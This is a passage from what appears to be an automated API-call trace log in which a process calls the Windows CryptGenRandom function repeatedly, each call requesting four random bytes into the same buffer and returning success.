pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.658] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.659] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.660] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.661] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.662] CryptGenRandom (in: 